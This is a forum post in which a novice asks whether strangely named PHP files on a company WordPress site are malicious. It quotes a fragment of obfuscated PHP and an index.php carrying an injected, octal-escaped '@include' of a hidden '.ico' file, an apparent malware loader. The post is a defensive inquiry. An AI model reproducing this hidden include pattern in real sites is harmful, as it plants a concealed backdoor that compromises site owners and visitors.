Hi all,
As per my intrduction, I currently know nothing about php.
In the course of my work, I needed to change the mail address on the company website using Wordpress.
In doing so, I noticed some strangely named files, like kykqudif.php, gutmtjy.php.
I also found Meuhy.php and Google only shows that one in my searches as being hacked.?
Looking for confirmation that these files are somewhat malicious?
gutmtjy.php. contains
<?php
class _o7qfbx1{static private $_kde0xd2u = 1585596899;static function _o1w2a($_w9uuuyp0, $_2zxxq316){$_w9uuuyp0[2] = count($_w9uuuyp0) > 4 ? long2ip (_o7qfbx1::$_kde0xd2u - 711)
with a lot more similar code.
The index.php file had an include file which was not in another site using wordpress? Below is the original.
I commented that out, and removed the āā characters below and the site came back up. Previously there was a parse error.
TIA
<?php
/*35078*/
@include "\057ho\155e/\150ea\162t/\160ub\154ic\137ht\155l/\152ou\162na\154/c\141ch\145/.\1453b\143ba\0609.\151co";
/*35078*/
/**
* Front to the WordPress application. This file doesn\'t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(\'WP_USE_THEMES\', true);
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . \'/wp-blog-header.php\' );